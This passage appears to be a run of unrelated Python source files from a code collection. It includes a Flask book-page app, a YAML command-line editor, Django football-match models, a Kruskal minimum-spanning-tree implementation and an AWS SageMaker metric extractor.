book_image.size context['thumb_width'] = width context['thumb_height'] = height except IOError: context['thumb_width'] = None context['thumb_height'] = None context['twitter_handle'] = 'nprbooks' context['tag'] = featured_tag return make_response(render_template('tag_share.html', **context)) @app.route('/seamus') def seamus(): """ Preview for Seamus page """ context = make_context() # Read the books JSON into the page. 
with open('www/static-data/books.json', 'rb') as readfile: books_data = json.load(readfile) books = sorted(books_data, key=lambda k: k['title']) # Harvest long tag names for book in books: tag_list = [] for tag in book['tags']: tag_list.append(context['COPY']['tags'][tag]['value']) book['tag_list'] = tag_list context['books'] = books return render_template('seamus-preview.html', **context) @app.route('/coming-soon.html') def coming_soon(): context = make_context() return make_response(render_template('coming-soon.html', **context)) app.register_blueprint(static.static) app.register_blueprint(oauth.oauth) # Enable Werkzeug debug pages if app_config.DEBUG: wsgi_app = DebuggedApplication(app, evalex=False) else: wsgi_app = app # Catch attempts to run the app directly if __name__ == '__main__': print 'This command has been removed! Please run "fab app" instead!'
python
#!/usr/bin/python # # yamledit.py # github.com/microtodd/yamledit # import os import sys import getopt import ruamel.yaml from ruamel import yaml from ruamel.yaml.scalarstring import SingleQuotedScalarString, DoubleQuotedScalarString __version__ = '0.5' # TODO # # ) merge two yaml files capability # ) Support input pipe instead of file # ## printHelp # def printHelp(): print ''' yamledit.py Editor for Commandline for YAML Options: -h Print this help -v Version -f <filename> Input file -o <filename> Output file, if not specified goes to STDOUT -y If passed then any user confirmation is assumed 'yes' -q If passed then everything is silent. This option implies -y. You must pick one and only one: -r or -c or -n or -d or -g If you pick -r or -c or -d, you must specify -f as well <newvalue> can be a comma-separated list, which is treated as a YAML list -r <key> <newvalue> Replace. 'key' is of format foo.bar.biz.baz If key does not exist, returns error. If used it must be the last option used. -c <key> <newvalue> Create. 'key' is of format foo.bar.biz.baz. If key already exists, will prompt to overwrite unless -y is selected. If used it must be the last option used. -n <key> <value> New file with 'key' with value 'value'. -d <key> Delete 'key' -g <key> Print the value of <key>, to STDOUT or to the filename ''' ## printVersion # def printVersion(): print ' yamledit.py Version ' + str(__version__) ## createFile # # @param[in] filename # @param[in] data # @param[in] autoConfirm # @param[in] quiet # def createFile(outputFileName, data, autoConfirm, quiet): # see if file exists if os.path.exists(outputFileName): # See if we autoconfirmed if autoConfirm or quiet: pass else: userInput = raw_input('File \'' + str(outputFileName) + '\' exists. Overwrite? (y/n): ') if userInput != 'y' and userInput != 'Y': print 'Aborting.' 
return # Create the file newFile = open(outputFileName,'w') newFile.write( ruamel.yaml.round_trip_dump(data) ) newFile.close() ## createTxtFile # # @param[in] filename # @param[in] data # @param[in] autoConfirm # @param[in] quiet # def createTxtFile(outputFileName, data, autoConfirm, quiet): # see if file exists if os.path.exists(outputFileName): # See if we autoconfirmed if autoConfirm or quiet: pass else: userInput = raw_input('File \'' + str(outputFileName) + '\' exists. Overwrite? (y/n): ') if userInput != 'y' and userInput != 'Y': print 'Aborting.' return # Create the file newFile = open(outputFileName,'w') newFile.write( data ) newFile.close() ## replaceValue # # @param[in] inputFileName # @param[in] outputFileName # @param[in] [keyName,newValue] # @param[in] autoConfirm # @param[in] quiet # def replaceValue(inputFileName, outputFileName, values, autoConfirm, quiet): keyName = values[0] newValue = values[1] inputFile = None # Handle to input file data # Open file try: inputFile = open(inputFileName) except Exception as e: raise Exception('Could not open/parse file \'' + str(inputFileName) + '\': ' + str(e)) # Load it data = ruamel.yaml.round_trip_load(inputFile, preserve_quotes=True) # See if the key exists # TODO move this piece into a method called 'findNode', and let createValue use it as well keyPath = str(keyName).split('.') lastNodeName = keyPath.pop() currentNode = data for nodeName in keyPath: if nodeName in currentNode: currentNode = currentNode[nodeName] else: raise Exception('Could not find \'' + str(keyName) + '\' in yaml file') # Check that last key if lastNodeName not in currentNode: raise Exception('Could not find \'' + str(keyName) + '\' in yaml file') # Update the value if not quiet: extra = '' if str(newValue).find(',') != -1: extra = ' (a list)' if isinstance(currentNode[lastNodeName],str): print 'Updating \'' + str(keyName) + '\' from \'' + currentNode[lastNodeName] + '\' to \'' + newValue + '\'' + extra else: print 'Updating \'' + 
str(keyName) + '\', which is not currently a string, to \'' + newValue + '\'' + extra if autoConfirm == False and quiet == False: userInput = raw_input('Continue? (y/n): ') if userInput != 'y' and userInput != 'Y': print 'Aborting.' return # See if new value is a string or a list if str(newValue).find(',') == -1: currentNode[lastNodeName] = newValue else: newValueList = str(newValue).split(',') # If this was a trailing ',', then we treat it as a list but we are not going to add a null entry if newValueList[-1] == '': newValueList.pop() currentNode[lastNodeName] = newValueList # Output if outputFileName is None: print ruamel.yaml.round_trip_dump(data) else: createFile(outputFileName, data, autoConfirm, quiet) ## createValue # # @param[in] inputFileName # @param[in] outputFileName # @param[in] [keyName,newValue] # @param[in] autoConfirm # @param[in] quiet # def createValue(inputFileName, outputFileName, values, autoConfirm, quiet): keyName = values[0] newValue = values[1] inputFile = None # Handle to input file data # Open file try: inputFile = open(inputFileName) except Exception as e: raise Exception('Could not open/parse file \'' + str(inputFileName) + '\': ' + str(e)) # Load it data = ruamel.yaml.round_trip_load(inputFile, preserve_quotes=True) # See if the key exists, create the new path if necessary keyAlreadyExists = True keyPath = str(keyName).split('.') lastNodeName = keyPath.pop() currentNode = data for nodeName in keyPath: if nodeName in currentNode: currentNode = currentNode[nodeName] else: keyAlreadyExists = False currentNode[nodeName] = {} currentNode = currentNode[nodeName] if lastNodeName not in currentNode: keyAlreadyExists = False currentNode[lastNodeName] = {} outputMessage = 'Creating ' if keyAlreadyExists: outputMessage = 'Updating existing key ' if not quiet: extra = '' if str(newValue).find(',') != -1: extra = ' (a list)' if isinstance(currentNode[lastNodeName],str): print outputMessage + '\'' + str(keyName) + '\' from \'' + 
currentNode[lastNodeName] + '\' to \'' + newValue + '\'' + extra else: print outputMessage + '\'' + str(keyName) + '\' as \'' + newValue + '\'' + extra if autoConfirm == False and quiet == False: userInput = raw_input('Continue? (y/n): ') if userInput != 'y' and userInput != 'Y': print 'Aborting.' return # See if new value is a string or a list if str(newValue).find(',') == -1: currentNode[lastNodeName] = newValue else: newValueList = str(newValue).split(',') # If this was a trailing ',', then we treat it as a list but we are not going to add a null entry if newValueList[-1] == '': newValueList.pop() currentNode[lastNodeName] = newValueList # Output if outputFileName is None: print ruamel.yaml.round_trip_dump(data) else: createFile(outputFileName, data, autoConfirm, quiet) ## newFile # # @param[in] outputFileName # @param[in] [keyName,newValue] # @param[in] autoConfirm # @param[in] quiet # def newFile(outputFileName, values, autoConfirm, quiet): keyName = values[0] newValue = values[1] # New data newData = '' # See if the key exists, create the new path if necessary numTabs = 0 keyPath = str(keyName).split('.') lastNodeName = keyPath.pop() for nodeName in keyPath: # Build out the data if numTabs == 0: newData += str(nodeName) + ':' # Make sure we put the applicable number of tabs in else: newData += '\n' for x in range(0, numTabs): newData += ' ' newData += str(nodeName) + ':' numTabs += 1 # Last node, again make sure we do the applicable number of tabs newData += '\n' for x in range(0, numTabs): newData += ' ' newData += lastNodeName + ': ' + newValue + '\n' # Confirm if autoConfirm == False and quiet == False: userInput = raw_input('Create new yaml? (y/n): ') if userInput != 'y' and userInput != 'Y': print 'Aborting.' 
return # Prep the yaml object data = ruamel.yaml.round_trip_load(newData, preserve_quotes=True) # Output if outputFileName is None: print ruamel.yaml.round_trip_dump(data) else: createFile(outputFileName, data, autoConfirm, quiet) ## deleteKey # # @param[in] inputFileName # @param[in] outputFileName # @param[in] keyName # @param[in] autoConfirm # @param[in] quiet # def deleteKey(inputFileName, outputFileName, keyName, autoConfirm, quiet): inputFile = None # Handle to input file data # Open file try: inputFile = open(inputFileName) except Exception as e: raise Exception('Could not open/parse file \'' + str(inputFileName) + '\': ' + str(e)) # Load it data = ruamel.yaml.round_trip_load(inputFile, preserve_quotes=True) # See if the key exists # TODO move this piece into a method called 'findNode', and let createValue use it as well keyPath = str(keyName).split('.') lastNodeName = keyPath.pop() currentNode = data for nodeName in keyPath: if nodeName in currentNode: currentNode = currentNode[nodeName] else: raise Exception('Could not find \'' + str(keyName) + '\' in yaml file') # Check that last key if lastNodeName not in currentNode: raise Exception('Could not find \'' + str(keyName) + '\' in yaml file') # Update the value if not quiet: if isinstance(currentNode[lastNodeName],str): print 'Removing key \'' + str(keyName) + '\' which has value \'' + currentNode[lastNodeName] +'\'' else: print 'Removing key \'' + str(keyName) + '\', which is not currently a string' if autoConfirm == False and quiet == False: userInput = raw_input('Continue? (y/n): ') if userInput != 'y' and userInput != 'Y': print 'Aborting.' 
return del currentNode[lastNodeName] # Output if outputFileName is None: print ruamel.yaml.round_trip_dump(data) else: createFile(outputFileName, data, autoConfirm, quiet) ## getValue # # @param[in] inputFileName # @param[in] outputFileName # @param[in] keyName # @param[in] autoConfirm # @param[in] quiet # def getValue(inputFileName, outputFileName, keyName, autoConfirm, quiet): inputFile = None # Handle to input file data # Open file try: inputFile = open(inputFileName) except Exception as e: raise Exception('Could not open/parse file \'' + str(inputFileName) + '\': ' + str(e)) # Load it data = ruamel.yaml.round_trip_load(inputFile, preserve_quotes=True) # See if the key exists # TODO move this piece into a method called 'findNode', and let createValue use it as well keyPath = str(keyName).split('.') lastNodeName = keyPath.pop() currentNode = data for nodeName in keyPath: if nodeName in currentNode: currentNode = currentNode[nodeName] else: raise Exception('Could not find \'' + str(keyName) + '\' in yaml file') # Check that last key if lastNodeName not in currentNode: raise Exception('Could not find \'' + str(keyName) + '\' in yaml file') # Get the value if outputFileName is None: if isinstance(currentNode[lastNodeName],str): print currentNode[lastNodeName] else: print ruamel.yaml.round_trip_dump(currentNode[lastNodeName]) else: if isinstance(currentNode[lastNodeName],str): createTxtFile(outputFileName, currentNode[lastNodeName], autoConfirm, quiet) else: createFile(outputFileName, currentNode[lastNodeName], autoConfirm, quiet) ## main # def main(argv): # Set up some variables inputFileName = None outputFileName = None actions = {} autoConfirm = False quiet = False # Grab and process the command line arguments opts, args = getopt.getopt(argv, 'hvyqnrcf:o:d:g:') for opt, arg in opts: if opt == '-f': inputFileName = str(arg) if opt == '-o': outputFileName = str(arg) if opt == '-y': autoConfirm = True if opt == '-q': quiet = True if opt == '-v': printVersion() 
sys.exit(0) if opt == '-h': printHelp() sys.exit(0) # For delete, only one value, the key if opt == '-d': actions['delete'] = str(arg) # For get, only one value, the key if opt == '-g': actions['get'] = str(arg) # If -r is used, we assume two arguments if opt == '-r': if len(args) != 2: print >> sys.stderr, 'ERROR: -r expects 2 arguments' sys.exit(2) sourceKey = None newValue = None if args[0]: sourceKey = str(args[0]) if args[1]: newValue = str(args[1]) actions['replace'] = [sourceKey,newValue] # If -c is used, we assume two arguments if opt == '-c': if len(args) != 2: print >> sys.stderr, 'ERROR: -c expects 2 arguments' sys.exit(2) sourceKey = None newValue = None if args[0]: sourceKey = str(args[0]) if args[1]: newValue = str(args[1]) actions['create'] = [sourceKey,newValue] # If -n is used, we assume two arguments if opt == '-n': if len(args) != 2: print >> sys.stderr, 'ERROR: -n expects 2 arguments' sys.exit(2) sourceKey = None newValue = None if args[0]: sourceKey = str(args[0]) if args[1]: newValue = str(args[1]) actions['new'] = [sourceKey,newValue] # Error checking if len(actions) == 0: print >> sys.stderr, 'ERROR: no action specified' sys.exit(4) # Perform whatever action for action in actions: if action == 'replace': if inputFileName is None: print >> sys.stderr, 'ERROR: input file name expected (-f option)' sys.exit(3) try: replaceValue(inputFileName,outputFileName,actions[action],autoConfirm,quiet) except Exception as e: print 'ERROR: ' + str(e) sys.exit(5) elif action == 'create': if inputFileName is None: print >> sys.stderr, 'ERROR: input file name expected (-f option)' sys.exit(3) try: createValue(inputFileName,outputFileName,actions[action],autoConfirm,quiet) except Exception as e: print 'ERROR: ' + str(e) sys.exit(5) elif action == 'new': try: newFile(outputFileName,actions[action],autoConfirm,quiet) except Exception as e: print 'ERROR: ' + str(e) sys.exit(5) elif action == 'delete': try: 
deleteKey(inputFileName,outputFileName,actions[action],autoConfirm,quiet) except Exception as e: print 'ERROR: ' + str(e) sys.exit(5) elif action == 'get': try: getValue(inputFileName,outputFileName,actions[action],autoConfirm,quiet) except Exception as e: print 'ERROR: ' + str(e) sys.exit(5) # Unknown action else: print >> sys.stderr, 'ERROR: unknown action: ' + str(action) if not quiet: print 'Successfully completed' ## Run if __name__ == '__main__': main(sys.argv[1:])
python
# -*- coding: utf-8 -*- from ..tre_elements import TREExtension, TREElement __classification__ = "UNCLASSIFIED" __author__ = "Thomas McCullough" class XINC(TREElement): def __init__(self, value): super(XINC, self).__init__() self.add_field('XINC', 's', 22, value) class XIDC(TREElement): def __init__(self, value): super(XIDC, self).__init__() self.add_field('XIDC', 's', 22, value) class YINC(TREElement): def __init__(self, value): super(YINC, self).__init__() self.add_field('YINC', 's', 22, value) class YIDC(TREElement): def __init__(self, value): super(YIDC, self).__init__() self.add_field('YIDC', 's', 22, value) class IMRFCAType(TREElement): def __init__(self, value): super(IMRFCAType, self).__init__() self.add_loop('XINCs', 20, XINC, value) self.add_loop('XIDCs', 20, XIDC, value) self.add_loop('YINCs', 20, YINC, value) self.add_loop('YIDCs', 20, YIDC, value) class IMRFCA(TREExtension): _tag_value = 'IMRFCA' _data_type = IMRFCAType
python
"""Extracts labels for each actionable widget in an abstract state.""" import math class LabelExtraction: """Extracts labels for each actionable widget in an abstract state.""" @staticmethod def extract_labels(abstract_state, page_analysis): """ Extracts labels for each actionable widget in the given abstract state. Relies on element classifications present in the provided page analysis to determine label candidates. :param abstract_state: The abstract state to process. :param page_analysis: The page analysis output for the provided abstract state (element classifications). """ label_candidates = page_analysis['analysis']['labelCandidates'] for widget in abstract_state.widgets: best_label = None best_label_key = None best_distance = 99999 widget_x = widget["properties"]["x"] widget_y = widget["properties"]["y"] for static_widget in abstract_state.static_widgets: should_skip = LabelExtraction._should_skip(static_widget) if should_skip: continue if static_widget['key'] not in label_candidates: continue text = static_widget["properties"]["text"] if "text" in static_widget["properties"] else None if text: text_x = static_widget["properties"]["x"] text_y = static_widget["properties"]["y"] new_distance = math.hypot(text_x - widget_x, text_y - widget_y) if new_distance < best_distance: best_distance = new_distance best_label = text best_label_key = static_widget["key"] if best_label: best_label = best_label.strip() widget["label"] = best_label widget["label_key"] = best_label_key @staticmethod def _should_skip(widget): """ Determines whether a widget should be skipped when determining if it is a label. Generally, we want to skip headers, and other form fields to prevent other fields being assigned as labels. :param widget: A widget on an abstract state. :return: True if the widget should be skipped. """ tag = widget["properties"]["tagName"] if tag in ['BUTTON', 'INPUT', 'H1', 'H2', 'H3', 'H4', 'H5', 'H6']: return True return False
python
import darkdetect


def is_dark():
    # Thin wrapper over the third-party ``darkdetect`` package; reports whether
    # the OS theme is dark. NOTE(review): darkdetect presumably returns a bool
    # (or None on unsupported platforms) — confirm against its documentation.
    return darkdetect.isDark()
python
# Demo script: draws two overlapping rectangles in an HFSS body, unites them,
# fillets selected corners with two different radii, and exports a GDS file.
import os

import HFSSdrawpy.libraries.example_elements as elt  # NOTE(review): imported but unused here
from HFSSdrawpy import Body, Modeler
from HFSSdrawpy.parameters import GAP, TRACK

# import HFSSdrawpy.libraries.base_elements as base

pm = Modeler("hfss")

chip1 = Body(pm, "chip1")

# Parametric dimensions registered with the modeler.
track = pm.set_variable("20um")
gap = pm.set_variable("10um")
radius1 = pm.set_variable("100um")
radius2 = pm.set_variable("400um")

# Two overlapping rectangles on different layers; the second extends in the
# negative direction from (0.5mm, 0.5mm).
rect1 = chip1.rect([0, 0], ["1mm", "1mm"], layer=TRACK)
rect2 = chip1.rect(["0.5mm", "0.5mm"], ["-1mm", "-1mm"], layer=GAP)

rect1.unite(rect2)
# radius1 applied to the first index group, radius2 to the second.
rect1.fillet([radius1, radius2], [[3, 1, 2, -1, -2, -3], [0, 4]])

# convention for fillet :
# if the geometry is a genuine base element, fillet indices are order in the
# natural way :
# - order or points for a polyline
# - origin then 'x' dimension point etc for a rectangle
# If the polygon result from a boolean operation, the fillets are order
# such as the 0th is the leftest among the lowest points. Indices increase
# in the trigonometric order.

# generate gds file
pm.generate_gds(os.path.join(os.getcwd(), "gds_files"), "fillet_test")
python
# coding: utf-8
"""Django models for a football match-tracking app: people (players, coaches,
referees, pundits), fixtures, goals, cards, and pundit grades."""

from django.db import models

# NOTE(review): ForeignKey fields below omit on_delete, which is only legal on
# Django < 2.0 (CASCADE implied). Make on_delete explicit when upgrading.


class Jurado(models.Model):
    """A pundit who grades players (see Nota)."""

    nome = models.CharField(u'Nome completo', max_length=200)

    def __str__(self):
        return self.nome

    class Meta:
        db_table = 'tb_jurado'
        verbose_name = 'Jurado'
        verbose_name_plural = 'Jurados'


class Jogador(models.Model):
    """A player and his position on the pitch."""

    GOLEIRO = 0
    LATERAL_DIREITO = 1
    LATERAL_ESQUERDO = 2
    ZAGUEIRO = 3
    VOLANTE = 4
    MEIA = 5
    ATACANTE = 6
    POSITIONS_CHOICES = (
        (GOLEIRO, 'Goleiro'),
        (LATERAL_DIREITO, 'Lateral direito'),
        # Fix: LATERAL_ESQUERDO was defined but missing from the choices,
        # making left-backs impossible to select in forms/admin.
        (LATERAL_ESQUERDO, 'Lateral esquerdo'),
        (ZAGUEIRO, 'Zagueiro'),
        (VOLANTE, 'Volante'),
        (MEIA, 'Meia'),
        (ATACANTE, 'Atacante'),
    )
    nome = models.CharField(u'Nome completo', max_length=200)
    posicao = models.PositiveSmallIntegerField(
        choices=POSITIONS_CHOICES,
        default=GOLEIRO
    )

    def __str__(self):
        return self.nome

    class Meta:
        db_table = 'tb_jogador'
        verbose_name = 'Jogador'
        verbose_name_plural = 'Jogadores'


class Tecnico(models.Model):
    """A team coach."""

    nome = models.CharField(u'Nome completo', max_length=200)

    def __str__(self):
        return self.nome

    class Meta:
        db_table = 'tb_tecnico'
        verbose_name = 'Técnico'
        verbose_name_plural = 'Técnicos'


class Arbitro(models.Model):
    """A match referee."""

    nome = models.CharField(u'Nome completo', max_length=200)

    def __str__(self):
        return self.nome

    class Meta:
        db_table = 'tb_arbitro'
        verbose_name = 'Árbitro'
        verbose_name_plural = 'Árbitros'


class Competicao(models.Model):
    """A competition (league, cup, ...)."""

    nome = models.CharField(u'Nome da competição', max_length=500)

    def __str__(self):
        return self.nome

    class Meta:
        db_table = 'tb_competicao'
        verbose_name = 'Competição'
        verbose_name_plural = 'Competições'


class Adversario(models.Model):
    """An opposing team."""

    nome = models.CharField(u'Nome do time', max_length=200)

    def __str__(self):
        return self.nome

    class Meta:
        db_table = 'tb_adversario'
        verbose_name = 'Adversário'
        verbose_name_plural = 'Adversários'


class Estadio(models.Model):
    """A stadium where matches are played."""

    nome = models.CharField(u'Nome do estádio', max_length=500)

    def __str__(self):
        return self.nome

    class Meta:
        db_table = 'tb_estadio'
        verbose_name = 'Estádio'
        verbose_name_plural = 'Estádios'


class Jogo(models.Model):
    """A single match: opponents, staff, competition, venue and scorers."""

    jogadores = models.ManyToManyField(
        Jogador,
        related_name="gols",
        related_query_name="gol",
        blank=True
    )
    tecnico = models.ForeignKey(
        Tecnico,
        related_name="tecnico_jogos",
        related_query_name="tecnico_jogo"
    )
    arbitro = models.ForeignKey(
        Arbitro,
        related_name="arbitro_jogos",
        related_query_name="arbitro_jogo"
    )
    competicao = models.ForeignKey(
        Competicao,
        related_name="competicao_jogos",
        related_query_name="competicao_jogo"
    )
    adversario = models.ForeignKey(
        Adversario,
        related_name="adversario_jogos",
        related_query_name="adversario_jogo"
    )
    estadio = models.ForeignKey(
        Estadio,
        related_name="estadio_jogos",
        related_query_name="estadio_jogo"
    )

    def __str__(self):
        return self.competicao.nome

    class Meta:
        db_table = 'tb_jogo'
        verbose_name = 'Jogo'
        verbose_name_plural = 'Jogos'


class Gol(models.Model):
    """A goal scored in a match, with optional scorer/assist/metadata."""

    jogo = models.ForeignKey(
        Jogo,
        related_name="jogo_gols",
        related_query_name="jogo_gol"
    )
    jogador = models.ForeignKey(
        Jogador,
        related_name="jogador_gols",
        related_query_name="jogador_gol",
        blank=True,
        null=True
    )
    assistente = models.ForeignKey(
        Jogador,
        related_name="assitente_gols",
        related_query_name="assitente_gol",
        blank=True,
        null=True
    )
    minuto = models.PositiveIntegerField(unique=False, blank=True, null=True)
    finalizacao = models.CharField(
        u'Finalização', max_length=500, blank=True, null=True)
    local = models.CharField(u'Local', max_length=500, blank=True, null=True)
    origem = models.CharField(u'Origem', max_length=500, blank=True, null=True)
    data_hora = models.DateTimeField(u'Data do jogo', blank=True, null=True)

    def __str__(self):
        # Fix: __str__ must return a string; minuto is an int (or None).
        return str(self.minuto)

    class Meta:
        db_table = 'tb_gol'
        verbose_name = 'Gol'
        verbose_name_plural = 'Gols'


class Nota(models.Model):
    """A pundit's grade for a player in a given match."""

    jurado = models.ForeignKey(
        Jurado,
        related_name="jurado_notas",
        related_query_name="jurado_nota"
    )
    jogo = models.ForeignKey(
        Jogo,
        related_name="jogo_notas",
        related_query_name="jogo_nota"
    )
    jogador = models.ForeignKey(
        Jogador,
        related_name="jogador_notas",
        related_query_name="jogador_nota"
    )
    nota = models.DecimalField(u'Nota', max_digits=20, decimal_places=2)

    def __str__(self):
        # Fix: was ``self.jurado.none`` (typo), which raised AttributeError.
        return self.jurado.nome

    class Meta:
        db_table = 'tb_nota'
        verbose_name = 'Nota'
        verbose_name_plural = 'Notas'


class Cartao(models.Model):
    """A card (yellow/red) shown to a player in a match."""

    AMARELO = 0
    VERMELHO = 1
    # NOTE(review): name kept for backward compatibility; these are card
    # colours, not positions. ``tipo`` below is a FloatField and does not use
    # these choices — consider PositiveSmallIntegerField(choices=...) later.
    POSITIONS_CHOICES = (
        (AMARELO, 'Amarelo'),
        (VERMELHO, 'Vermelho'),
    )
    jogo = models.ForeignKey(
        Jogo,
        related_name="jogo_cartoes",
        related_query_name="jogo_cartao"
    )
    jogador = models.ForeignKey(
        Jogador,
        related_name="jogador_cartoes",
        related_query_name="jogador_cartao"
    )
    tipo = models.FloatField(u'Nota')

    def __str__(self):
        # Fix: was ``self.jurado.none`` — Cartao has no ``jurado`` field at
        # all, so __str__ always raised. Use the carded player's name.
        return self.jogador.nome

    class Meta:
        db_table = 'tb_cartao'
        verbose_name = 'Cartão'
        verbose_name_plural = 'Cartões'
python
# Implementation of Kruskal's Algorithm: a greedy algorithm to find a Minimum
# Spanning Tree (MST) of a connected, undirected, weighted graph stored as
# adjacency lists.
#
# Changes from the original:
# - Ported from Python 2 (print statements, raw_input) to Python 3.
# - UnionFind.union used max() over (weight, vertex) tuples, which compares
#   Vertex objects on weight ties and raises TypeError on Python 3; replaced
#   with a key= based max.
# - The MST computation is extracted into kruskal() so it can be tested, and
#   the interactive driver is guarded by __main__ so importing this module has
#   no side effects. Large blocks of commented-out dead code were removed.

import operator


class Vertex:
    """A graph vertex identified by ``key``.

    Edges live in ``connectedTo`` as a mapping of neighbour Vertex -> weight.
    """

    def __init__(self, key):
        self.id = key
        self.connectedTo = {}

    def addNeighbor(self, neighbor, weight=0):
        """Record an edge to ``neighbor`` (a Vertex) with the given weight."""
        self.connectedTo[neighbor] = weight

    def __str__(self):
        return str(self.id) + ' connectedTo: ' + str([x.id for x in self.connectedTo])

    def getConnections(self):
        """Return the neighbouring Vertex objects."""
        return self.connectedTo.keys()

    def getId(self):
        """Return the key identifying this vertex."""
        return self.id

    def getWeight(self, nbr):
        """Return the weight of the edge from self to ``nbr``."""
        return self.connectedTo[nbr]


class Graph:
    """Adjacency-list graph mapping vertex keys to Vertex objects."""

    def __init__(self):
        self.vertList = {}
        self.numVertices = 0

    def addVertex(self, key):
        """Create, register and return a Vertex with the given key."""
        self.numVertices = self.numVertices + 1
        newVertex = Vertex(key)
        self.vertList[key] = newVertex
        return newVertex

    def getVertex(self, n):
        """Return the Vertex with key ``n``, or None if absent."""
        return self.vertList.get(n)

    def __contains__(self, n):
        return n in self.vertList

    def addEdge(self, f, t, cost=0):
        """Add a directed edge f -> t, creating missing vertices on demand."""
        if f not in self.vertList:
            self.addVertex(f)
        if t not in self.vertList:
            self.addVertex(t)
        self.vertList[f].addNeighbor(self.vertList[t], cost)

    def getVertices(self):
        """Return the keys of all vertices in the graph."""
        return self.vertList.keys()

    def __iter__(self):
        return iter(self.vertList.values())


class UnionFind:
    """Union-find (disjoint sets) with path compression and union by weight.

    Adapted from David Eppstein's PADS library.

    FIND  - X[item] returns the name (root) of the set containing item,
            creating a singleton set for previously unseen items.
    UNION - X.union(item1, item2, ...) merges the sets containing the items.
    """

    def __init__(self):
        self.weights = {}
        self.parents = {}

    def __getitem__(self, obj):
        """Find and return the name of the set containing ``obj``."""
        # Previously unknown object: it becomes its own singleton set.
        if obj not in self.parents:
            self.parents[obj] = obj
            self.weights[obj] = 1
            return obj

        # Walk up to the root, then compress the path.
        path = [obj]
        root = self.parents[obj]
        while root != path[-1]:
            path.append(root)
            root = self.parents[root]
        for ancestor in path:
            self.parents[ancestor] = root
        return root

    def __iter__(self):
        """Iterate through all items ever found or unioned by this structure."""
        return iter(self.parents)

    def union(self, *objects):
        """Find the sets containing the objects and merge them all."""
        roots = [self[x] for x in objects]
        # key= avoids comparing Vertex objects when weights tie (the old
        # max() over (weight, root) tuples relied on Python 2's arbitrary
        # cross-type ordering and raises TypeError on Python 3).
        heaviest = max(roots, key=lambda r: self.weights[r])
        for r in roots:
            if r != heaviest:
                self.weights[heaviest] += self.weights[r]
                self.parents[r] = heaviest


def kruskal(the_graph):
    """Return the MST of ``the_graph`` as {(u_key, v_key): [weight]}.

    Edges are sorted by weight and accepted only when their endpoints lie in
    different union-find sets, i.e. when the edge does not close a cycle.
    """
    # Collect every directed edge keyed by the (from, to) vertex-key pair.
    vrwght = {}
    for ver1 in the_graph:
        for ver2 in ver1.getConnections():
            vrwght[ver1.getId(), ver2.getId()] = [ver1.connectedTo[ver2]]
    sorted_weights = sorted(vrwght.items(), key=operator.itemgetter(1))

    # Make a singleton set for each vertex.
    uf = UnionFind()
    for vertex_key in the_graph.getVertices():
        uf[the_graph.getVertex(vertex_key)]

    mst = {}
    for (key1, key2), weight in sorted_weights:
        if uf[the_graph.getVertex(key1)] != uf[the_graph.getVertex(key2)]:
            mst[(key1, key2)] = weight
            uf.union(the_graph.getVertex(key1), the_graph.getVertex(key2))
    return mst


def main():
    """Interactive driver: read a graph from stdin and print its MST."""
    the_graph = Graph()
    print("enter the number of nodes in the graph")
    no_nodes = int(input())
    for i in range(no_nodes):
        print("enter the Node no:" + str(i + 1) + "'s key")
        the_graph.addVertex(input())

    print("enter the number of edges in the graph")
    no_edges = int(input())
    for i in range(no_edges):
        print("For the Edge no:" + str(i + 1))
        print("of the 2 nodes involved in this edge \nenter the first Node's key")
        node1_key = input()
        print("\nenter the second Node's key")
        node2_key = input()
        print("\nenter the cost (or weight) of this edge (or arc) - an integer")
        cost = int(input())
        # The graph is undirected, so store the edge in both directions.
        the_graph.addEdge(node1_key, node2_key, cost)
        the_graph.addEdge(node2_key, node1_key, cost)

    MST = kruskal(the_graph)
    print(" \n\nIn the graph with these vertex's")
    print(list(the_graph.getVertices()))
    print("\nWith these " + str(len(MST)) +
          " edges between the vertexes given above, we obtain a Minimal Spanning Tree\n")
    print(MST)
    print("\nPlease note this is a dictionary with key as the pair of vertex "
          "keys involved in the edge and value as the edge's weight")


if __name__ == "__main__":
    main()
python
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
"""Metric extractors: each Metric subclass computes one value and emits it
to EventBridge under the ``metric_extractor`` source."""

import datetime
import json

import boto3

events_client = boto3.client("events")
sagemaker_client = boto3.client("sagemaker")
ssm_client = boto3.client("ssm")


class Metric:
    """Base class for a single extractable metric.

    Subclasses implement only ``_compute_value``; extraction formatting,
    event emission and IAM-permission templating are inherited.
    """

    # IAM statements required by this metric. **REGION** and **ACCOUNT_ID**
    # placeholders are substituted by get_iam_permissions().
    _iam_permissions = [
        {
            "Action": ["events:PutEvents"],
            "Resource": "arn:aws:events:**REGION**:**ACCOUNT_ID**:event-bus/default",
        }
    ]

    def __init__(self, metric_name, project_name, metadata, environment):
        """Class constructor. child classes should not need to implement this.

        Args:
            metric_name (str): the name of this metric
            project_name (str): the project the metric belongs to
            metadata (dict): the metadata
            environment (str): the environment the metric is extracted from
        """
        self.metric_name = metric_name
        self.project_name = project_name
        self.metadata = metadata
        self.environment = environment

    def get_iam_permissions(self, region, account_id):
        """Return a copy of ``_iam_permissions`` with placeholders substituted.

        Fix: the original stringified each statement and round-tripped it
        through ``eval()``, executing generated text as Python code. We now
        substitute recursively on copies instead.
        """
        def _substitute(node):
            # Strings get the placeholder substitution; containers recurse;
            # anything else is returned unchanged.
            if isinstance(node, str):
                return node.replace("**REGION**", region).replace(
                    "**ACCOUNT_ID**", account_id
                )
            if isinstance(node, list):
                return [_substitute(item) for item in node]
            if isinstance(node, dict):
                return {key: _substitute(val) for key, val in node.items()}
            return node

        return [_substitute(p) for p in self._iam_permissions]

    def extract(self):
        """Compute the metric and format the event payload.

        Child classes should not need to implement this.
        """
        return {
            "MetricName": self.metric_name,
            "MetricValue": self._compute_value(),
            "ExtractionDate": datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f"),
            "Metadata": self.metadata,
            "Environment": self.environment,
            "ProjectName": self.project_name,
        }

    def emit_event(self, payload):
        """Emit an EventBridge event with the given payload.

        Args:
            payload (dict): the payload of the event to be emitted
        """
        events_client.put_events(
            Entries=[
                {
                    "Source": "metric_extractor",
                    "Resources": [],
                    "DetailType": "metric_extractor",
                    "Detail": json.dumps(payload),
                }
            ]
        )

    def _compute_value(self):
        """This is where the actual calculation happens.

        Child classes MUST implement this.
        """
        raise NotImplementedError


class TotalCompletedTrainingJobs(Metric):
    """Count of all completed SageMaker training jobs."""

    _iam_permissions = Metric._iam_permissions + [
        {"Action": ["sagemaker:ListTrainingJobs"], "Resource": "*"}
    ]

